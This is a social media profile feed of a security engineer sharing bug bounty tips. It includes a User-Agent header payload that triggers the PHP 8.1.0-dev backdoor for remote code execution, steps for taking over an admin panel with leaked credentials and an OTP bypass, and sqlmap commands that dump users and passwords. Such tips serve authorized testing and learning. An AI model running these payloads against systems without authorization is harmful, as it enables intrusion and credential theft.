Abdalla Abdelrhman
@0x2nac0nda
Security Engineer | Web & Mobile Security | Binary Exploitation | Code review (PHP, Java,Python) | Code | Digital Forensics | #HTB | #CTF Player
ID:1212821619032199168
02-01-2020 19:43:23
856 Tweets
2,2K Followers
453 Following
When you learn from someone,who provides you with information and you would like to meet them, this occurred in #Blackhatmea
Thanks Rana Khalil 🇵🇸 🙏
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbounty #bugbounty tips #rce #sqli
Admin panel pwn~ Ahsan Khan
1. Found credentials on dehashed.com
2. Applied on admin.site.com = Protected with OTP
3. Bypassed using API
4. admin.site.com/api/login?user…
Great talk by Orange Tsai 🍊 at #RomHack2023 ! Learned a lot and feeling inspired! 👏 #CyberSecurity #InfoSec
الإرهاق الوظيفي و #الامن_السيبراني
تغريدة تلخص لك أبرز التحديات في المجال
العمل في المجال التقني، وبالأخص #الأمن_السيبراني ، وذلك بسبب التحديات والتطلعات والآمال الكبيرة الموضوعة على عاتق المختصين مما يسبب لهم الإرهاق.
#يتبع
Using a #proxy with #SQLmap
sqlmap -u 'target.com' --proxy='http:// 127.0.0.1 :8080'
#bugbountytips #BugBounty #burp
Custom injection in #UserAgent / #Header / #Referer / #Cookie
python sqlmap.py -u 'example.com' --data 'username=admin&password=pass' --headers='x-forwarded-for:127.0.0.1*' The injection is located at the '*'
#bugbountytips #BugBounty
Load a request file and use mobile #user -agent
sqlmap -r sqli.req --safe-url=http://0x2nac0nda .com/ --mobile --safe-freq=1
#bugbountytips #BugBounty
Basic arguments for #SQL map
sqlmap --url='<url>' -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
#bugbountytips #BugBounty #SQL #sqlmap